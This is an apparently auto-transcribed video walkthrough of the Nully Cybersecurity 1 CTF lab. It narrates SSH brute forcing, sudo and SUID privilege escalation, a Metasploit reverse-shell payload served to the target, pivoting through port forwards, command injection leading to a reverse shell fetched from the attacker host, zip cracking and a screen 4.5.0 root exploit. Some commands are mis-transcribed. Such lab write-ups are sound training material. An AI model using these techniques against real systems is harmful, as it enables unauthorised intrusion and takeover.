Yo, what's going on, guys? In this video, we're going to be doing Nully Cybersecurity 1. The difficulty on this box is rated about medium. And yeah, let's get on to the video. Alright, I'm going to start by splitting my terminals here. I'm going to start by running a netdiscover -r 10.0.0.1/24/IT0. By doing this, we do get the IP of the box 10.0.0.184. So I'm going to do Control-Shift-Z. So I'm running nmap scan. So I'll do nmap -sc for default scripts, -v for enumeration, scan on ports and IP. Doing this, I'm going to do -v for verbos. In this case, I'm just going to cat the scan.nmap, which is outputted by nmap. Doing this, looking at the ports, we do have port 80 open for HTTP. This is running Apache. We also do have port 110 for POP3, port 2222 for OpenSSH, and this is a Ubuntu server. We also do have port 8000 and also port 9000 for CS listener rate. So doing this, I'm going to start by visiting port 80. Visiting port 80, we do get the Nully Cybersecurity CTF. We do need to root the MailServer, the web server, and also the database server. And we can start by checking our email for port 110 rate with pentester as the user, and also this string as a password rate. So I'm just going to copy this, start by doing a banner grab. So do we have port 110 open for POP3? I'm going to do netcat -nv on 10.0.0.194. I'm just going to do 110 for POP3. I'm going to specify user, followed by the user, and then copy the password. So we just enter pass, followed by the pass, and we are now logged in, right? So I'm going to do list. And this seems like we do have one message, so I'm just going to do retr, so we can retrieve that message. And this seems like we do have an email here, right? So we do have user as Bob, and this is from root from the mail server, and sent to pentester as the user we are logged in right now, right? It's telling us that they did forget the password, but the password was simple, right? So doing this, I'm going to start by using Hydra. Clear my terminals here. I'm going to do Hydra -L. We'll specify Bob as a user -p for the word list. User share word list rockyou.txt. SSH 10.0.0.194. We'll do port 2222 for SSH. We'll do -I, so we're going to restore the session, right? So we can press on that. It does seem like we do get a password as Bobby1985. So I'm going to do SSH into Bob 10.0.0.194. I'll do -p for 2222 for the port. We're going to press enter. And we do get a long successful rate. Alright, I'm going to start by clearing my terminals here. I'm going to start by running ID. I'm also running sudo -l. It does seem like we run a bash against check.sh. So I'm just going to do an ls-la to see who runs this, right? So I'm going to do ls-la on check.sh. It does seem like we can edit the script, and this is also run by my2user. So I'm going to just vi into check.sh. And since this is run by a different user, I'm just going to run a bin/bash on here so we can get a shell as a user. So here we can just copy this. So I'm just run a sudo -u where we do have a user as my2user. We'll do specify bin/bash. It does seem like we are under my2user, right? I'm going to also run a sudo -l. It does seem like we can run root for zip. So I'm just going to go to GTFOBINS. Type in zip. We can run sudo against this. So I'm just going to copy this. Copy that. We can run bash. Now we have rooted the MailServer, right? So we're going to do ID, and now we are under root, right? And here's our first _flag.txt, right? So doing this, we're going to start by pivoting. So doing this, I'm just going to do ifconfig to see what we are under the IP address as 172.17.0.3. I'm going to check if we do have nmap on here so we can scan for other servers, and it does seem like we do, right? So doing this, I'm just going to do nmap -sn. We'll do /24. It does seem like we do have other servers on here, right? So we do have 0.1, 0.2, 0.4, and 0.5, right? So I'm just going to run nmap scan on all of these. So I'll do nmap scan all ports on 0.1. I'll just do 2. We'll do 3. We'll do 4. It does seem like there's SSH open on this port or on the server. So we'll do 4. We do have FTP and also SSH, and I'll do 5. It does seem like we do have port 22 open for SSH and also port 80 open for HTTP, right? So doing this, we're going to start by, I'm just going to search up like a payload for MSF. We'll just do MSF console. We'll just search up elf file. We'll just go to this one here. So I'm just going to copy this and generate this payload real quick. So I'm just going to copy and paste this. So I'm going to enter my IP address here, which is 10.0.069, and we also do a port of 4444. 4444, and it's going to output it to a shell.elf, right? So I'm going to do python 3 -m http.server on port 8081. Let's just get this on the target machine, http 10.0.069 on port 8081. We didn't know a shell.elf, right? So we press on that. We'll do chmod +x for shell.elf. We can run a shell.elf, right? I'm going to cancel this, start up Metasploit. So I'm going to do MSF console. We're just going to start an exploit multi-handler, right? So we're going to just use exploit multi-handler. We're just going to show option or set, we'll just set the lhost as 10.0.069. We run this. So now our handler is started. We can press enter on this. And we do see that you get a interpreter, right? If you do notice, you do see that we don't get a interpreter session open. The reason for that is because if we just exile this, we do need to set the payload, right? So if you go to set payload here, you can just copy this payload here that was used in for the shell. You go to set payload as this, run this. We run this one more time. You do see that we do get a interpreter session open, right? So now I can run a sysinfo, and you do see that we're on the 172.17.0.3, right? So if you did look back up here, we are going to be attacking, which was 172.17.0.5. So if I run a shell, I'm just run an nmap on 0.5. We're just going to see we can port forward port 80, right? And if we do get creds for SSH, what we'll just do, we can just port forward SSH, right? So I'm just going to exile this, and we're under the interpreter, right? So I'm going to run auto route. We'll do auto route -s, and we'll specify 0.1/24. We can start by port forwarding. So I'm going to do port forward add -l. This is going to be the local port that's going to be on your machine. I'm just going to run this on port 9999. I'll do -p, we're going to port forward 80. So I'll do 80. I will do -r for the remote host, which is 172.17.0.5, right? So I'm pressing on that. So I'm just going to cancel this. I'll do run an nmap on my local host. We should have port 9999, right? Which we do have right here, right? So doing this, I'm just going to visit my local host. So local host on port 9999. And it does seem like we do get it under construction. And there should be a website here, right? We do have a username as Oliver. I'm going to do control UTV source code. And it doesn't seem like we're doing anything, right? So doing this, I'm going to start by running a gobuster. So do gobuster dir mode -u into the IP address -w/user share word list. We'll do dirbuster directory list to intermedium.txt. We'll do extensions as HTML, TXT, and also PHP. And we can just let this run, right? All right, so it does seem like we do have a robots.txt. So I'm going to start by visiting robots.txt. We do have a /ping, so I'm just going to copy this for /ping. And here we do have an for oscar.txt. So it does seem like they're writing a ping for every console every time. It just seemed like they wrote a ping utility to check for other servers, which I'm guessing is for ping.php. It's saying to use the host parameter, right? So I'm just going to do $host is equal to, we'll just do 10.0.069. We'll do control UTV source code. It does seem like it's using the ping command, right? So doing this, I'm just going to do like colon or semicolon and see if we can do like some command injection. So I'm just going to do ID. And it does seem like we are under dub data, right? So it does seem like this is vulnerable to command injection, and I'm just going to send this within burp. So I'm going to go to proxy, start a burp. So I'm going to close the next, start a burp. We'll go to proxy, go to options, go to specific address, go to OK, go to intercept. We can take off the view source here, press it on that, send this within repeater, send this. Maybe the request will opt out. If this doesn't work within burp, I'm just going to send this within, I'm just going to view the output within the browser, right? Maybe if I do URL code this. Doesn't seem like we do get an output. Maybe send this one more time. And it doesn't seem like we're getting an output for this unless it's just loading, which I don't think it is. So yeah, it doesn't seem like we do get an output. So I'm just going to run this within the browser, right? So doing this, I'm just going to go to payload all things, see if we can spawn a reverse shell. So I'm just going to go payload all the things. I'm just get a rev shell. So we'll do Control F, we'll do Python. So I'm gonna copy this, put this within here. We'll just run this in Python. I'm just gonna run this in Python 3, and we do have the IP address is 10.0.0.69, and I'm just gonna run this on port 9001, right? So doing this, I'm gonna start up my listener. So cancel this, we'll do all rep, netcat my cell MVP on 9001. Press enter on this. And it does seem like we do get an OS error, right, out of PTY devices. I'm going to try the same thing with bash. So I'm just going to go to bash. Let's see. Right here. So I'm just going to copy this. I'll just take that off. Make sure we do have our listener up. So we press enter on that. Since it's not letting us run Python or bash on here, I'm just going to use wget, right? So I'm going to check we do have which wget. So I'm just do which wget on here. Do Control U to the source code. And it does seem like we do have user bin wget, right? So doing this, I'm just going to vi into shell.sh. I'm going to go to reactor mode, run a bin/bash. I'll go back over here. I'm just going to copy this, put this in here. We'll do 10.0.0.69 and we'll run this on port 9001. Or space here. Right quit. So I'm going to start my Python server, which is a Python 3 -m http.server on port 8081. Since we have wget, I'm going to do a wget http 10.0.0.69. We'll do some port 8081 and we'll get our shell.sh. I'm going to do capital O so we can now put this to /temp/shell.sh. Let me see port or 10.0.0.69. And it does seem like we do get a GET request from the server for shell.sh, right? So now our shell.sh is under, it's now under /temp. So I'll do all rep netcat minus lmvp on 9001. Now we can just run a bin/bash, right? So I'm just going to run a bash temp against temp/sh. And we do get a shell, right? So I'm going to do ID. And now we're under www, right? So I'm going to start by exporting my term as equal to xterm. Clear this. Do s-la. I'm going to cd into home/home. And it does seem like we have a user as Oliver and also Oscar, right? So I'm going to go under Oliver. Doesn't seem like we do have anything under there. cd into Oscar. Doesn't seem like we can cd into Oscar, right? So I'm going to cd into temp. We'll do ls-la. You do see that we do have our shell.sh under there. And this was pointing to our IP address on 9001, right? So I'm just clear my terminals here. I'm going to cd into my documents and download, see if we can get SUIDENUM on the machine, right? So do Python 3 -m http.server on port 8081. We're going to get this file right here. So we'll do wget http 10.0.0.69 on port 8081. So we'll do chmod +x for that. So we can now run this. And it does seem like we do have a custom SUID binary here, which is user bin Python 3. So I'm just going to run an ls-la against it. And it does seem like it's running, it's a SUID bitset running as Oscar, right? So I'm just going to run, I'm just going to copy and paste that. Go to GTFOBINS. Type in Python here. Just going to go to shell, which is do Control F, do SUID. I'm just going to copy this. Paste that in. We do ID, and now we are under Oscar, right? So I'm gonna do ls-la. I'm gonna run a bash under here. It does seem like every time we run a bash, we go back to www data. So I'm just not gonna run a bash anymore, right? So I'm gonna cd. So I'm cd into home. We do ID, and now we are under Oscar, right? So we'll cd into Oscar. We'll do ls-la. It does seem like we do have a my password here, so I'm just cat this out. It does seem like this is the password for Oscar, right? So I'm just going to copy this. We have the password for Oscar. Paste that in there. I'm going to cd into scripts. And before running this, I'm actually going to get a precision shell in the box since we do have the password for Oscar, right? So going back over here, we're going to start by pivoting one more time. So we're going to do port forward. We'll just do add a -L. I'm just going to do this on port 2223, which is going to be for SSH. We'll do port 22 for SSH. We'll do -R on the same host, right? So I'm going to cd back. So do nmap minus scan all ports on my local host. And we do have port 2223, right? So do SSH. We do know is Oscar at 10.0.069, which is my local IP address. On port 2223. Here we did have the password here. So I'm just copy this, put that in there. And we do get logged in as Oscar, right? So now we do have a precision shell on the box, right? So I'm going to do ID. So we're going to sudo myself. It doesn't seem like we run sudo on the server, right? So I'm going to cd into my scripts. It does seem like we do have a SUID binary here. So I'm just going to run a file against this. And it is a SUID bit set. I'm also going to run the strings against this, against current data or current date. And it does seem like it's just running the date command, right? Just to confirm this, I'm just going to run current data. And I'll put the date command, right? So looking at this, if we do analysis -A on current date, if you did look at the date command, so if I run the strings against current date, you did see that it was running the date command without a path, right? If I do run current date, you just see that it does output the date command, right? So doing this, we can create our own binary and run it, just change our path, right? So I'm going to start by running a bin/bash on here. I'm just going to copy this to, we'll copy this to temp. It's going to run, we'll just name this as date. We'll do chmod/temp on date. Do chmod +x or chmod 777 on /temp date. We'll just start by exporting if I echo my $path, you do see that our path is user local sbin, right? So we can start by changing that. So I'm going to export my path is equal to /temp. We'll do $path. Now, if I do echo out my path, you see that we are now under temp, which is first before all these, right? So doing this, I'm going to run current date. And you see that we are under root. We now -A. We can we'll cd into root. We can cat our second _flag.txt, right? All right, so now we have rooted the web server. Now it's time to go to the database server. So doing this, I'm just going to run a ifconfig on this. I believe the next server was nmap. We scan all ports on 0.4, I believe, which is running FTP, which is port 21 for FTP and also port 22 for SSH. So I'll do FTP. We'll run this. We'll enter the IP address. It does seem like we do have connection refused, which is 0.4. We'll just log in as anonymous, see if anonymous mode is enabled. We do have a .pub here, or pub. So do have a test. So I'm just going to get this test file, which doesn't have anything under there. I'm going to cd into .folder. So do -A. I'm going to get this file.txt. Also get this .backup. So mix out this. And now we do have our .backup.zip. And also our file.txt, right? So I'm going to cat this file.txt. So we'll see what we have under here. It just shows nothing here. And we do have this file right here, right? So I'm gonna start by unzipping this. It doesn't seem like we have zip on here, right? So I'm just gonna go to apt install zip since we are root. Now we can start by running unzip. And it does require a password, right? Since I don't want to transfer this to my machine to use fcrackzip, so I'm just gonna apt install. We'll just use fcrackzip. So now we can use fcrackzip, right? So do fcrackzip -u -d. I will specify -p. In this case, we don't have a word list here, so I'm just going to cancel that and search up rockyou.txt. So I'm just going to do rockyou.txt file. So I'm just going to copy link location, just make sure it's the right link. I'll just we'll go to rockyou.txt. We'll just search up like GitHub, right? So I'm just going to go here and go to copy link location. I'm just going to wget this. This is in a .gc file, so I'm going to use gunzip against this, which is against rockyou.txt. So gunzip rockyou.txt. We'll do else-slay, and now we do have our rockyou.txt, right? So now we can use fcrackzip. So do fcrackzip -u, we'll do -d, -p, we'll specify user, or just rockyou.txt. We'll specify .backup.zip, right? I did find a password as this. So now we can unzip .backup.zip. And we do have creds.txt, so we'll cat the creds.txt. And we do have Donald and also this password right here, right? So I'm just going to copy this, put this into our text editor, which should have Donald in that. Looking back over here, we did have port 22 open for SSH, or let's see where it was. It was, I believe it was, let's see, if you scan all ports on 0.4, we do have port 22 open for SSH, right? So I'm just going to X out this. So I'm going to start by port forwarding this. So we'll do port forward minus port forward add minus L. We'll do port, I'm just going to run this on port 2225. We'll do -p for port 22. We'll do -r for, which is going to be this IP address. We press enter. So I'm just going to split this. We'll run a nmap scan on our local host. And looking back over here, you do see that we did port forward this on 2225. And we do have 2225, right? So I'm going to do SSH. I'm just going to log in as, I believe it was Donald at 10.0.069 onto port 2225. Type in yes. We do have a password as this. So I'm going to copy this, put this in here. We do get logged in as Donald, right? So I'm going to do sudo -l. Doesn't seem like we run sudo. Now we're on the database server. It does seem like Donald is the only user on here. So I'm going to do some manual enumeration, go /opt, do /-la. It does seem like we do have a screen 4.5.0. And also let's just cd into this, see what this is about. I'm going to go /temp. I'm just going to run SUIDENUM again. So I'm just going to split this one more time. So we'll cd into documents, go to privilege escalations, cd into SUIDENUM. We'll do /-la. We'll do python 3 -m http.server on port 8081. Some wget http 10.0.069 on port 8081 for SUIDENUM. We'll do chmod +x for SUIDENUM. Run this one more time. We do have a custom SUID binary as screen, right? So I'm just going to search up screen now. Which we do have screen. And this is ran by, we'll just copy this. We'll do /-la on this. And this is ran by root, right? So it only allows us to run sudo, or you can do like a file write on here. But if you did look at this, it just gives us a version of screen 4.5.0. So I'm just going to copy this. We'll just search up like exploit. See if there's an exploit for this, which it does seem like there's an exploit for GNU. So we can just view the raw data here. I'm just going to copy this. I'm just going to vi into exploit.sh. Paste that in there. I'm just going to right quit. We'll do /-la. We'll do chmod +x for exploit.sh. Run exploit.sh. We do ID. Now we are under root. We can cat our third flag.txt, right? You can just run a bash on here and cat our third _flag.txt. Well, guys, that's pretty much in the video. Don't forget to like and subscribe, and I'll catch you guys in the next one. Peace.